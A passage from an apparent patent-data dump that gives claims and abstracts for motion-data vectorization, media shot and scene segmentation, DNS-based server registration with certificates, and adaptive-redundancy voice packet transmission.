dynamically selecting one or more of a plurality of predefined data extraction algorithms and an object library by said motion data processor based on matching of said extracted motion data with selection criteria; and extracting said motion data of subsequent said image frames by said motion data processor using said dynamically selected one or more of said predefined data extraction algorithms and said object library. 5. The method of claim 1, wherein said motion data comprises image data associated with said object in motion, trajectory data of motion of said object in motion, relative physical dimensions of said object, a type of said object, spatial coordinates of said object in said each of said image frames, sequence data of said image frames, and time stamp data of said each of said image frames. 6. The method of claim 1, wherein each of said vectors of said generated matrix is defined by two or more spatial coordinates. 7. The method of claim 1, wherein said generated matrix of vectors is represented by a representation box, wherein said representation box is configured to define prospective trajectory data of motion of said detected object in motion. 8. The method of claim 1, further comprising compressing said video data by a data compression processor in operable communication with an image signal processor. 9. The method of claim 1, further comprising compressing said extracted motion data and said generated matrix of vectors by a data compression processor in operable communication with said motion data processor. 10. The method of claim 1, further comprising dynamically enhancing image granularity of said video data by an image signal processor in operable communication with said image sensor, for facilitating said extraction of said motion data from said each of said image frames by said motion data processor. 11. 
The method of claim 1, further comprising capturing one or more snapshots of said detected object in motion by said image sensor on receiving an indication from said motion data processor, for facilitating identification and said analysis of said detected object in motion from said each of said image frames of said video data. 12. A motion data extraction and vectorization system for extracting and vectorizing motion data of an object in motion with optimized data storage and data transmission bandwidth, said motion data extraction and vectorization system comprising:
an image sensor configured to capture video data comprising a series of image frames of said object in motion; a motion data processor in operable communication with said image sensor, said motion data processor configured to receive said video data from said image sensor; said motion data processor further configured to detect said object in motion from consecutive said image frames of said received video data; said motion data processor further configured to extract motion data of said detected object in motion from each of said image frames of said received video data; said motion data processor further configured to generate a matrix of vectors configured to define said object in motion for said each of said image frames using said extracted motion data; and a storage unit in operable communication with said motion data processor, said storage unit configured to maintain said generated matrix of vectors for one or more of local storage, transmission, and analysis. 13. The motion data extraction and vectorization system of claim 12, further comprising an operations unit in operable communication with said storage unit, wherein said operations unit is configured to transmit said generated matrix of vectors from said storage unit to an analytics system for said analysis, wherein said analytics system is configured to perform said analysis comprising one or more of estimating prospective trajectory data of motion of said detected object in motion, determining a period of presence of said object, determining a velocity of traversal of said object in motion, and determining gestures of said object. 14. The motion data extraction and vectorization system of claim 12, wherein said motion data processor is configured to perform said detection of said object in motion from said consecutive said image frames by:
comparing said consecutive said image frames with each other for detecting said object in motion, while excluding a background of said object in motion; and comparing said detected object in motion with one or more object libraries for confirming said detection of said object in motion. 15. The motion data extraction and vectorization system of claim 12, wherein said motion data processor is further configured to dynamically select one or more of a plurality of predefined data extraction algorithms and an object library based on matching of said extracted motion data with selection criteria, and wherein said motion data processor is further configured to extract said motion data of subsequent said image frames using said dynamically selected one or more of said predefined data extraction algorithms and said object library. 16. The motion data extraction and vectorization system of claim 12, wherein said motion data comprises image data associated with said object in motion, trajectory data of motion of said object in motion, relative physical dimensions of said object, a type of said object, spatial coordinates of said object in said each of said image frames, sequence data of said image frames, and time stamp data of said each of said image frames. 17. The motion data extraction and vectorization system of claim 12, wherein each of said vectors of said generated matrix is defined by two or more spatial coordinates. 18. The motion data extraction and vectorization system of claim 12, wherein said generated matrix of vectors is represented by a representation box, wherein said representation box is configured to define prospective trajectory data of motion of said detected object in motion. 19. 
The motion data extraction and vectorization system of claim 12, wherein said image sensor is further configured to capture one or more snapshots of said detected object in motion on receiving an indication from said motion data processor, for facilitating identification and said analysis of said detected object in motion from said each of said image frames of said video data. 20. The motion data extraction and vectorization system of claim 12, further comprising a data compression processor in operable communication with an image signal processor, wherein said data compression processor is configured to compress said video data enhanced by said image signal processor. 21. The motion data extraction and vectorization system of claim 12, further comprising a data compression processor in operable communication with said motion data processor, wherein said data compression processor is configured to compress said extracted motion data and said generated matrix of vectors received from said motion data processor. 22. The motion data extraction and vectorization system of claim 12, further comprising an image signal processor in operable communication with said image sensor, wherein said image signal processor is configured to dynamically enhance image granularity of said video data received from said image sensor for facilitating said extraction of said motion data from said each of said image frames by said motion data processor. 23. 
The motion data extraction and vectorization system of claim 12, further comprising an image signal processor integrated with said image sensor for enhancing an image quality of said video data received from said image sensor, wherein said image signal processor is in operable communication with said motion data processor and a data compression processor positioned in parallel to each other, wherein said motion data processor is configured to extract and vectorize said motion data of said detected object in motion from said video data enhanced by said image signal processor, and wherein said data compression processor is configured to compress said video data enhanced by said image signal processor. 24. The motion data extraction and vectorization system of claim 12, further comprising an image signal processor integrated with said image sensor for enhancing an image quality of said video data received from said image sensor, wherein said image signal processor is in operable communication with said motion data processor, wherein said motion data processor is configured to extract and vectorize said motion data of said detected object in motion from said video data enhanced by said image signal processor. 25. The motion data extraction and vectorization system of claim 12, wherein said motion data processor is operably connected in series between an image signal processor and a data compression processor for said extraction and said vectorization of said motion data of said detected object in motion from said video data enhanced by said image signal processor, wherein said image signal processor is integrated with said image sensor for enhancing an image quality of said video data received from said image sensor, and wherein said data compression processor is configured to compress said motion data that is extracted and vectorized by said motion data processor. 26. 
The motion data extraction and vectorization system of claim 12, further comprising an image signal processor integrated with a data compression processor, and wherein said motion data processor is operably connected between said image sensor and said data compression processor for said extraction and said vectorization of said motion data of said detected object in motion from said video data received from said image sensor, wherein said image signal processor is configured to enhance an image quality of said video data received from said image sensor, and wherein said data compression processor is configured to compress said motion data that is extracted and vectorized by said motion data processor and to compress said video data enhanced by said image signal processor. 27. The motion data extraction and vectorization system of claim 12, further comprising an image signal processor and a data compression processor positioned in parallel communication with said motion data processor and disabled when motion of said object is not detected for optimizing power consumption required for said capture of said video data. 28. The motion data extraction and vectorization system of claim 12, wherein said storage unit is further configured to store enhanced video data, compressed video data, said extracted motion data, compressed motion data, said generated matrix of vectors, and a compressed said matrix of vectors. 29. The motion data extraction and vectorization system of claim 12 configured as one or more of an integrated chip and a computer system comprising at least one processor configured to execute computer program instructions for said extraction and said vectorization of said motion data of said detected object in motion with said optimized data storage and said data transmission bandwidth. 30. 
A computer program product comprising a non-transitory computer readable storage medium, said non-transitory computer readable storage medium storing computer program codes that comprise instructions executable by a motion data processor, said computer program codes comprising:
a first computer program code for detecting an object in motion from consecutive image frames of video data received from an image sensor; a second computer program code for extracting motion data of said detected object in motion from each of a series of image frames of said received video data, wherein said motion data comprises image data associated with said object in motion, trajectory data of motion of said object in motion, relative physical dimensions of said object, a type of said object, spatial coordinates of said object in said each of said image frames, sequence data of said image frames, and time stamp data of said each of said image frames; and a third computer program code for generating a matrix of vectors configured to define said object in motion for said each of said image frames using said extracted motion data. 31. The computer program product of claim 30, wherein said first computer program code further comprises:
a fourth computer program code for comparing said consecutive said image frames with each other for detecting said object in motion, while excluding a background of said object in motion; and a fifth computer program code for comparing said detected object in motion with one or more object libraries for confirming said detection of said object in motion. 32. The computer program product of claim 30, wherein said second computer program code further comprises:
a sixth computer program code for dynamically selecting one or more of a plurality of predefined data extraction algorithms and an object library based on matching of said extracted motion data with selection criteria; and a seventh computer program code for extracting said motion data of subsequent said image frames using said dynamically selected one or more of said predefined data extraction algorithms and said object library. | 2,400 |
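The claims above describe a concrete pipeline: detect an object in motion by comparing consecutive image frames (excluding the background), extract motion data per frame, and generate a matrix of vectors defined by spatial coordinates, sequence data, and time stamps. The following is a minimal Python sketch of that pipeline for illustration only; the function names, the 2-D-list frame representation, and the difference threshold are assumptions, not the patented implementation.

```python
# Illustrative sketch of the claimed pipeline: compare consecutive frames to
# find moving pixels (background excluded), then emit one vector per frame:
# [sequence number, time stamp, x_min, y_min, x_max, y_max].

def detect_motion(prev_frame, frame, threshold=10):
    """Return (x, y) coordinates of pixels that changed between two frames."""
    moving = []
    for y, (prev_row, row) in enumerate(zip(prev_frame, frame)):
        for x, (p, c) in enumerate(zip(prev_row, row)):
            if abs(c - p) > threshold:
                moving.append((x, y))
    return moving

def vectorize(frames, timestamps):
    """Build the matrix of vectors: one bounding-box vector per frame pair."""
    matrix = []
    for i in range(1, len(frames)):
        pixels = detect_motion(frames[i - 1], frames[i])
        if not pixels:
            continue  # no object in motion detected in this frame
        xs = [x for x, _ in pixels]
        ys = [y for _, y in pixels]
        matrix.append([i, timestamps[i], min(xs), min(ys), max(xs), max(ys)])
    return matrix

# Two 4x4 grayscale frames: a bright 2x2 "object" moves one pixel to the right.
f0 = [[0] * 4 for _ in range(4)]
f1 = [[0] * 4 for _ in range(4)]
for y in (1, 2):
    for x in (0, 1):
        f0[y][x] = 200
    for x in (1, 2):
        f1[y][x] = 200

m = vectorize([f0, f1], [0.0, 0.033])
print(m)  # → [[1, 0.033, 0, 1, 2, 2]]
```

The vector format matches the claim language loosely: each row carries sequence data (frame index), time stamp data, and spatial coordinates of the detected object; real systems would add trajectory, object type, and dimension fields.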
9,167 | 9,167 | 15,199,677 | 2,484 | There is provided a system including a non-transitory memory storing an executable code and a hardware processor executing the executable code to receive a media content including a plurality of frames, divide the media content into a plurality of shots, each of the plurality of shots including a plurality of frames of the media content based on a first similarity between the plurality of frames, determine a plurality of sequential shots of the plurality of shots to be part of a first sub-scene of a plurality of sub-scenes of a scene based on a timeline continuity of the plurality of sequential shots, identify each of the plurality of shots of the media content and each of the plurality of sub-scenes with a corresponding beginning time code and a corresponding ending time code. | 1. A system comprising:
a non-transitory memory storing an executable code; a hardware processor executing the executable code to:
receive a media content including a plurality of frames;
divide the media content into a plurality of shots, each of the plurality of shots including a plurality of frames of the media content based on a first similarity between the plurality of frames;
determine a plurality of sequential shots of the plurality of shots to be part of a first sub-scene of a plurality of sub-scenes of a scene based on a timeline continuity of the plurality of sequential shots;
identify each of the plurality of shots of the media content and each of the plurality of sub-scenes with a corresponding beginning time code and a corresponding ending time code. 2. The system of claim 1, wherein the hardware processor further executes the executable code to:
determine one or more sequential sub-scenes of the plurality of sub-scenes to be part of the scene; and identify the scene with a corresponding beginning time code and a corresponding ending time code. 3. The system of claim 1, wherein the hardware processor further executes the executable code to:
receive a user input annotating at least one of a shot, a sub-scene, and a scene. 4. The system of claim 3, wherein the hardware processor further executes the executable code to:
store the user input in an annotation database in the non-transitory memory. 5. The system of claim 1, wherein the hardware processor further executes the executable code to:
transmit one or more of the plurality of shots for display on a display. 6. The system of claim 5, wherein the hardware processor further executes the executable code to:
transmit a supplemental content related to the plurality of shots for display on the display concurrent with the display of the plurality of shots. 7. The system of claim 1, wherein the first similarity between the plurality of frames of the media content is one of a same character, a same setting, and a same theme. 8. The system of claim 1, wherein the first similarity is determined using one of an edit decision list, a metadata content, and computer vision. 9. The system of claim 1, wherein the plurality of sub-scenes in the scene provide context to at least one of a preceding sub-scene of the scene and a succeeding sub-scene of the scene. 10. The system of claim 1, wherein each scene includes at least one connecting element. 11. A method for use with a system comprising a non-transitory memory and a hardware processor, the method comprising:
receiving, using the hardware processor, a media content; dividing, using the hardware processor, the media content into a plurality of shots, each of the plurality of shots including a plurality of frames of the media content based on a first similarity between the plurality of frames; determining, using the hardware processor, a plurality of sequential shots of the plurality of shots to be part of a first sub-scene of a plurality of sub-scenes of a scene based on a timeline continuity of the plurality of sequential shots; and identifying, using the hardware processor, each of the plurality of shots of the media content and each of the plurality of sub-scenes with a corresponding beginning time code and a corresponding ending time code. 12. The method of claim 11, further comprising:
determining, using the hardware processor, one or more sequential sub-scenes of the plurality of sub-scenes to be part of the scene; and identifying, using the hardware processor, the scene with a corresponding beginning time code and a corresponding ending time code. 13. The method of claim 11, further comprising:
receiving, using the hardware processor, a user input annotating at least one of a shot, a sub-scene, and a scene. 14. The method of claim 13, further comprising:
storing the user input in an annotation database in the non-transitory memory. 15. The method of claim 11, further comprising:
transmitting, using the hardware processor, one or more of the plurality of shots for display on a display. 16. The method of claim 15, further comprising:
transmitting, using the hardware processor, a supplemental content related to the plurality of shots for display on the display concurrent with the display of the plurality of shots. 17. The method of claim 11, wherein the first similarity between the plurality of frames of the media content is one of a same character, a same setting, and a same theme. 18. The method of claim 11, wherein the first similarity is determined using one of an edit decision list, a metadata content, and computer vision. 19. The method of claim 11, wherein the plurality of sub-scenes in the scene provide context to at least one of a preceding sub-scene of the scene and a succeeding sub-scene of the scene. 20. The method of claim 11, wherein each scene includes at least one connecting element. | There is provided a system including a non-transitory memory storing an executable code and a hardware processor executing the executable code to receive a media content including a plurality of frames, divide the media content into a plurality of shots, each of the plurality of shots including a plurality of frames of the media content based on a first similarity between the plurality of frames, determine a plurality of sequential shots of the plurality of shots to be part of a first sub-scene of a plurality of sub-scenes of a scene based on a timeline continuity of the plurality of sequential shots, identify each of the plurality of shots of the media content and each of the plurality of sub-scenes with a corresponding beginning time code and a corresponding ending time code.1. A system comprising:
a non-transitory memory storing an executable code; a hardware processor executing the executable code to:
receive a media content including a plurality of frames;
divide the media content into a plurality of shots, each of the plurality of shots including a plurality of frames of the media content based on a first similarity between the plurality of frames;
determine a plurality of sequential shots of the plurality of shots to be part of a first sub-scene of a plurality of sub-scenes of a scene based on a timeline continuity of the plurality of sequential shots;
identify each of the plurality of shots of the media content and each of the plurality of sub-scenes with a corresponding beginning time code and a corresponding ending time code. 2. The system of claim 1, wherein the hardware processor further executes the executable code to:
determine one or more sequential sub-scenes of the plurality of sub-scenes to be part of the scene; and identify the scene with a corresponding beginning time code and a corresponding ending time code. 3. The system of claim 1, wherein the hardware processor further executes the executable code to:
receive a user input annotating at least one of a shot, a sub-scene, and a scene. 4. The system of claim 3, wherein the hardware processor further executes the executable code to:
store the user input in an annotation database in the non-transitory memory. 5. The system of claim 1, wherein the hardware processor further executes the executable code to:
transmit one or more of the plurality of shots for display on a display. 6. The system of claim 5, wherein the hardware processor further executes the executable code to:
transmit a supplemental content related to the plurality of shots for display on the display concurrent with the display of the plurality of shots. 7. The system of claim 1, wherein the first similarity between the plurality of frames of the media content is one of a same character, a same setting, and a same theme. 8. The system of claim 1, wherein the first similarity is determined using one of an edit decision list, a metadata content, and computer vision. 9. The system of claim 1, wherein the plurality of sub-scenes in the scene provide context to at least one of a preceding sub-scene of the scene and a succeeding sub-scene of the scene. 10. The system of claim 1, wherein each scene includes at least one connecting element. 11. A method for use with a system comprising a non-transitory memory and a hardware processor, the method comprising:
receiving, using the hardware processor, a media content; dividing, using the hardware processor, the media content into a plurality of shots, each of the plurality of shots including a plurality of frames of the media content based on a first similarity between the plurality of frames; determining, using the hardware processor, a plurality of sequential shots of the plurality of shots to be part of a first sub-scene of a plurality of sub-scenes of a scene based on a timeline continuity of the plurality of sequential shots; and identifying, using the hardware processor, each of the plurality of shots of the media content and each of the plurality of sub-scenes with a corresponding beginning time code and a corresponding ending time code. 12. The method of claim 11, further comprising:
determining, using the hardware processor, one or more sequential sub-scenes of the plurality of sub-scenes to be part of the scene; and identifying, using the hardware processor, the scene with a corresponding beginning time code and a corresponding ending time code. 13. The method of claim 11, further comprising:
receiving, using the hardware processor, a user input annotating at least one of a shot, a sub-scene, and a scene. 14. The method of claim 13, further comprising:
storing the user input in an annotation database in the non-transitory memory. 15. The method of claim 11, further comprising:
transmitting, using the hardware processor, one or more of the plurality of shots for display on a display. 16. The method of claim 15, further comprising:
transmitting, using the hardware processor, a supplemental content related to the plurality of shots for display on the display concurrent with the display of the plurality of shots. 17. The method of claim 11, wherein the first similarity between the plurality of frames of the media content is one of a same character, a same setting, and a same theme. 18. The method of claim 11, wherein the first similarity is determined using one of an edit decision list, a metadata content, and computer vision. 19. The method of claim 11, wherein the plurality of sub-scenes in the scene provide context to at least one of a preceding sub-scene of the scene and a succeeding sub-scene of the scene. 20. The method of claim 11, wherein each scene includes at least one connecting element. | 2,400 |
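The method claims above divide media content into shots based on a similarity between frames and identify each shot with a beginning and ending time code. Below is a hedged Python sketch of that segmentation step; the scalar frame representation, the similarity function, the threshold, and the frame rate are all illustrative assumptions rather than the claimed computer-vision implementation.

```python
# Illustrative sketch: split a frame sequence into shots wherever the
# similarity between consecutive frames drops below a threshold, then tag
# each shot with (beginning, ending) time codes.

def divide_into_shots(frames, similarity, threshold=0.9):
    """Group frame indices into shots by consecutive-frame similarity."""
    shots = [[0]]
    for i in range(1, len(frames)):
        if similarity(frames[i - 1], frames[i]) >= threshold:
            shots[-1].append(i)   # same shot: frames are similar enough
        else:
            shots.append([i])     # similarity dropped: new shot begins
    return shots

def time_codes(shots, fps=24.0):
    """Identify each shot with a corresponding beginning and ending time code."""
    return [(s[0] / fps, (s[-1] + 1) / fps) for s in shots]

# Toy frames reduced to mean-intensity scalars; similarity is closeness
# of intensity, normalized to [0, 1].
frames = [10, 11, 12, 90, 91, 50, 51, 52]

def sim(a, b):
    return 1.0 - abs(a - b) / 255.0

shots = divide_into_shots(frames, sim)
print(shots)                  # → [[0, 1, 2], [3, 4], [5, 6, 7]]
print(time_codes(shots)[0])   # → (0.0, 0.125)
```

Grouping sequential shots into sub-scenes by timeline continuity, as the claims further recite, would be a second pass over `shots` that merges runs whose time codes are contiguous.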
9,168 | 9,168 | 16,589,002 | 2,491 | A method for establishing communication includes receiving a request to establish communication with a server, the request including an internet protocol address of the server, forming a unique domain name comprising a unique part and a general part, and associating the unique domain name with the internet protocol address. The method further includes storing the unique domain name in association with the internet protocol address on a domain name server, and establishing a communication between a user device and the server by resolving the unique domain name. | 1. A method for establishing communication in a network supporting a plurality of user devices and servers, the method comprising:
receiving, by a second server via an interface, a request to register a first server, the request including a unique name of the first server and an internet protocol address of the first server; forming, by the second server, a unique domain name for the first server based on the unique name of the first server; associating, by the second server, the unique domain name with the internet protocol address; providing, by the second server, the unique domain name to the first server; and providing, by the second server, the unique domain name in association with the internet protocol address to a domain name server. 2. The method of claim 1, wherein the unique domain name comprises the unique name of the first server and a general part, the unique name corresponds to a subdomain part of the unique domain name, and the general part corresponds to a domain part of the unique domain name. 3. The method of claim 2, further comprising obtaining, by the second server, a certificate from a certification authority, wherein the certificate is obtained for any unique domain name that includes the general part. 4. The method of claim 3, further comprising providing, by the second server, the certificate to the first server. 5. (canceled) 6. The method of claim 1, wherein the first server is communicating with the user device over a local area network. 7. The method of claim 1, wherein the communication between the user device and the first server is facilitated by web browsers. 8. The method of claim 1, wherein a websocket protocol is used for full-duplex communication between the user device and the first server. 9. The method of claim 1, wherein the first server blocks all inbound and outbound communications with devices outside a local area network, apart from communications with the domain name server. 10. The method of claim 1, wherein the request is received by a third party. 11. 
A system for facilitating communications between a client device and a first server, comprising:
a second server communicatively connected with the first server and a domain name server, wherein the second server includes at least one processor for executing operations comprising: receiving, via an interface, a request to register the first server, the request including a unique name of the first server and an internet protocol address of the first server; forming a unique domain name for the first server based on the unique name of the first server; associating the unique domain name with the internet protocol address; providing the unique domain name to the first server; and providing the unique domain name in association with the internet protocol address to the domain name server. 12. The system of claim 11, wherein the unique domain name comprises the unique name of the first server and a general part, the unique name corresponds to a subdomain part of the unique domain name, and the general part corresponds to a domain part of the unique domain name. 13. The system of claim 12, wherein the at least one processor further executes operations comprising obtaining a certificate from a certification authority, wherein the certificate is obtained for any unique domain name that includes the general part. 14. The system of claim 13, wherein the at least one processor further executes operations comprising providing the certificate to the server. 15. (canceled) 16. A non-transitory computer readable medium including instructions that, when executed by at least one processor of a second server, cause the at least one processor to perform operations comprising:
receiving, via an interface, a request to register a first server, the request including a unique name of the first server and an internet protocol address of the first server; forming a unique domain name for the first server based on the unique name of the first server; associating the unique domain name with the internet protocol address; providing the unique domain name to the first server; and providing the unique domain name in association with the internet protocol address to a domain name server. 17. The non-transitory computer readable medium of claim 16, wherein the unique domain name comprises the unique name of the first server and a general part, the unique name corresponds to a subdomain part of the unique domain name, and the general part corresponds to a domain part of the unique domain name. 18. The non-transitory computer readable medium of claim 17, wherein the operations further comprising obtaining a certificate from a certification authority, wherein the certificate is obtained for any unique domain name that includes the general part. 19. The non-transitory computer readable medium of claim 18, wherein the operations further comprising providing the certificate to the first server. 20. The non-transitory computer readable medium of claim 16, wherein the first server blocks all inbound and outbound communications with devices outside a local area network, apart from communications with the domain name server. | A method for establishing communication includes receiving a request to establish communication with a server, the request including an internet protocol address of the server, forming a unique domain name comprising a unique part and a general part, and associating the unique domain name with the internet protocol address. 
The method further includes storing the unique domain name in association with the internet protocol address on a domain name server, and establishing a communication between a user device and the server by resolving the unique domain name. 1. A method for establishing communication in a network supporting a plurality of user devices and servers, the method comprising:
receiving, by a second server via an interface, a request to register a first server, the request including a unique name of the first server and an internet protocol address of the first server; forming, by the second server, a unique domain name for the first server based on the unique name of the first server; associating, by the second server, the unique domain name with the internet protocol address; providing, by the second server, the unique domain name to the first server; and providing, by the second server, the unique domain name in association with the internet protocol address to a domain name server. 2. The method of claim 1, wherein the unique domain name comprises the unique name of the first server and a general part, the unique name corresponds to a subdomain part of the unique domain name, and the general part corresponds to a domain part of the unique domain name. 3. The method of claim 2, further comprising obtaining, by the second server, a certificate from a certification authority, wherein the certificate is obtained for any unique domain name that includes the general part. 4. The method of claim 3, further comprising providing, by the second server, the certificate to the first server. 5. (canceled) 6. The method of claim 1, wherein the first server is communicating with the user device over a local area network. 7. The method of claim 1, wherein the communication between the user device and the first server is facilitated by web browsers. 8. The method of claim 1, wherein a websocket protocol is used for full-duplex communication between the user device and the first server. 9. The method of claim 1, wherein the first server blocks all inbound and outbound communications with devices outside a local area network, apart from communications with the domain name server. 10. The method of claim 1, wherein the request is received by a third party. 11. 
A system for facilitating communications between a client device and a first server, comprising:
a second server communicatively connected with the first server and a domain name server, wherein the second server includes at least one processor for executing operations comprising: receiving, via an interface, a request to register the first server, the request including a unique name of the first server and an internet protocol address of the first server; forming a unique domain name for the first server based on the unique name of the first server; associating the unique domain name with the internet protocol address; providing the unique domain name to the first server; and providing the unique domain name in association with the internet protocol address to the domain name server. 12. The system of claim 11, wherein the unique domain name comprises the unique name of the first server and a general part, the unique name corresponds to a subdomain part of the unique domain name, and the general part corresponds to a domain part of the unique domain name. 13. The system of claim 12, wherein the at least one processor further executes operations comprising obtaining a certificate from a certification authority, wherein the certificate is obtained for any unique domain name that includes the general part. 14. The system of claim 13, wherein the at least one processor further executes operations comprising providing the certificate to the server. 15. (canceled) 16. A non-transitory computer readable medium including instructions that, when executed by at least one processor of a second server, cause the at least one processor to perform operations comprising:
receiving, via an interface, a request to register a first server, the request including a unique name of the first server and an internet protocol address of the first server; forming a unique domain name for the first server based on the unique name of the first server; associating the unique domain name with the internet protocol address; providing the unique domain name to the first server; and providing the unique domain name in association with the internet protocol address to a domain name server. 17. The non-transitory computer readable medium of claim 16, wherein the unique domain name comprises the unique name of the first server and a general part, the unique name corresponds to a subdomain part of the unique domain name, and the general part corresponds to a domain part of the unique domain name. 18. The non-transitory computer readable medium of claim 17, wherein the operations further comprising obtaining a certificate from a certification authority, wherein the certificate is obtained for any unique domain name that includes the general part. 19. The non-transitory computer readable medium of claim 18, wherein the operations further comprising providing the certificate to the first server. 20. The non-transitory computer readable medium of claim 16, wherein the first server blocks all inbound and outbound communications with devices outside a local area network, apart from communications with the domain name server. | 2,400 |
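The registration flow of claims 1-2 of application 16,589,002 above can be sketched as follows. All class and variable names, and the general part `devices.example.com`, are illustrative assumptions: the second (registration) server forms the unique domain name from the first server's unique name (the subdomain part) plus a fixed general part (the domain part), associates it with the IP address, and provides the mapping to a domain name server.

```python
# Hedged sketch of claims 1-2; names are hypothetical, not from the filing.
GENERAL_PART = "devices.example.com"  # assumed general (domain) part

class DnsServer:
    """Stand-in for the domain name server that stores name -> IP records."""
    def __init__(self):
        self.records = {}
    def add_record(self, domain_name, ip):
        self.records[domain_name] = ip
    def resolve(self, domain_name):
        return self.records[domain_name]

class RegistrationServer:
    """Stand-in for the 'second server' that registers a first server."""
    def __init__(self, dns):
        self.dns = dns
    def register(self, unique_name, ip):
        # Form the unique domain name: subdomain part + general part.
        unique_domain = f"{unique_name}.{GENERAL_PART}"
        # Associate it with the IP and provide it to the domain name server.
        self.dns.add_record(unique_domain, ip)
        # Provide the unique domain name back to the first server.
        return unique_domain

dns = DnsServer()
reg = RegistrationServer(dns)
name = reg.register("printer-42", "192.168.1.10")
```

A user device would then reach the first server simply by resolving `name` against the DNS server, which is the communication-establishment step of the abstract.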
9,169 | 9,169 | 14,485,482 | 2,465 | Voice data transmission with adaptive redundancy creates a voice data packet by packetizing the voice data payload and a number of redundant payloads selected from a set of previous voice data payloads. The voice data from the voice data payload is analysed to determine whether it is a critical or non-critical payload by classifying the received voice data as voiced or unvoiced. If at least a portion of the voice data is classified as unvoiced, the voice data payload is determined to be a critical payload. If it is a critical payload, then the voice data payload is added to the set of previous voice data payloads for inclusion as a redundant payload in subsequent voice data packets. The voice data packet is then forwarded for transmission over the network. | 1. A method for transmitting voice data packets with redundancy in a network, the method comprising:
receiving voice data and encoding the voice data as a voice data payload; packetizing the voice data payload to generate a voice data packet including the voice data payload, the voice data packet further including at least one redundant payload selected from a set of previous voice data payloads; determining whether the encoded voice data payload is a critical payload or non-critical payload by classifying the received voice data as voiced or unvoiced, wherein, if at least a portion of the voice data is classified as unvoiced, the encoded voice data payload is determined to be a critical payload; adding the encoded voice data payload to the set of previous voice data payloads for inclusion as a redundant payload in subsequent voice data packets if the encoded voice data payload is determined to be a critical payload; and forwarding the voice data packet for transmission over the network. 2. The method of claim 1, further comprising: receiving a network statistics report and estimating a redundancy value based on the network statistics report, and wherein the number of redundant payloads is based on the redundancy value. 3. The method of claim 1, wherein, if the voice data is classified as voiced, the determining further comprises calculating a waveform similarity factor for the received voice data. 4. The method of claim 3, wherein calculating the waveform similarity factor comprises deriving a pitch for the voice data. 5. The method of claim 3, wherein calculating the waveform similarity factor comprises setting the waveform similarity factor to zero if the voice data is determined to be noise. 6. The method of claim 3, wherein, if the voice data is classified as voiced, the determining further comprises: calculating a variance value using the waveform similarity factor and comparing the variance value to a threshold value to determine whether the voice data payload is a critical payload. 7. 
The method of claim 1, wherein, if the voice data payload is determined to be a non-critical payload, then the voice data payload is not added to the set of previous voice data payloads. 8. The method of claim 1, wherein the packetizing further comprises determining that one or more preceding voice data payloads were selectively dropped prior to transmission over the network, and adding one or more of the dropped preceding voice data payloads to the voice data packet. 9. The method of claim 1, further comprising, subsequent to forwarding the voice data packet: determining whether to drop the voice data payload without transmitting it over the network. 10. The method of claim 2, wherein the network statistics report comprises at least one of: out-of-order packet statistics for packets previously sent for transmission over the network; and lost packet statistics for packets previously sent for transmission over the network. 11. A system for transmitting voice data packets with redundancy in a network, the system comprising:
an encoder configured to receive voice data and generate an encoded voice data payload from the voice data; a packetizer configured to packetize the encoded voice data payload to generate a voice data packet including the encoded voice data payload, the voice data packet further comprising at least one redundant payload selected from a set of previous voice data payloads; a packet identifier configured to determine whether the encoded voice data payload is a critical payload or non-critical payload by classifying the received voice data as voiced or unvoiced, wherein, if at least a portion of the voice data is classified as unvoiced, the encoded voice data payload is determined to be a critical payload, and, if the voice data payload is determined to be a critical payload, then the encoded voice data payload is added to the set of previous voice data payloads for inclusion as a redundant payload in subsequent voice data packets; and a transmitter configured to forward the voice data packet for transmission over the network. 12. The system of claim 11, further comprising: a network report receiver configured to receive a network statistics report; and a redundancy estimator configured to estimate a redundancy value based on the network statistics report, wherein the number of redundant payloads is based on the redundancy value. 13. The system of claim 11, wherein, if the voice data is classified as voiced, the packet identifier is configured to calculate a waveform similarity factor for the received voice data. 14. The system of claim 13, wherein the packet identifier calculates the waveform similarity factor based on a pitch of the voice data, and sets the waveform similarity factor to zero if the voice data is determined to be noise. 15. 
The system of claim 13, wherein, if the voice data is classified as voiced, the packet identifier is configured to calculate a variance value using the waveform similarity factor and compare the variance value to a threshold value to determine whether the voice data payload is a critical payload. 16. The system of claim 11, wherein, if the voice data payload is determined to be a non-critical payload, then the voice data payload is not added to the set of previous voice data payloads. 17. The system of claim 11, wherein the packetizer is further configured to determine that one or more preceding voice data payloads were selectively dropped prior to transmission over the network, and add one or more of the dropped preceding voice data payloads to the voice data packet. 18. The system of claim 11, wherein the transmitter is further configured to determine whether to drop the voice data payload, subsequent to forwarding the voice data packet. 19. The system of claim 11, wherein the network statistics report comprises at least one of: out-of-order packet statistics for packets previously sent by the transmitter; and lost packet statistics for packets previously sent by the transmitter. 20. A non-transitory computer readable storage medium having stored therein computer-executable instructions that cause a computer to:
receive voice data and encode the voice data as a voice data payload; packetize the voice data payload to generate a voice data packet including the voice data payload, the voice data packet further including at least one redundant payload selected from a set of previous voice data payloads; determine whether the voice data payload is a critical payload or non-critical payload by classifying the received voice data as voiced or unvoiced, wherein, if at least a portion of the voice data is classified as unvoiced, the voice data payload is determined to be a critical payload; add the voice data payload to the set of previous voice data payloads for inclusion as the redundant payload in subsequent voice data packets if the voice data payload is determined to be a critical payload; and forward the voice data packet for transmission over the network. | Voice data transmission with adaptive redundancy creates a voice data packet by packetizing the voice data payload and a number of redundant payloads selected from a set of previous voice data payloads. The voice data from the voice data payload is analysed to determine whether it is a critical or non-critical payload by classifying the received voice data as voiced or unvoiced. If at least a portion of the voice data is classified as unvoiced, the voice data payload is determined to be a critical payload. If it is a critical payload, then the voice data payload is added to the set of previous voice data payloads for inclusion as a redundant payload in subsequent voice data packets. The voice data packet is then forwarded for transmission over the network. 1. A method for transmitting voice data packets with redundancy in a network, the method comprising:
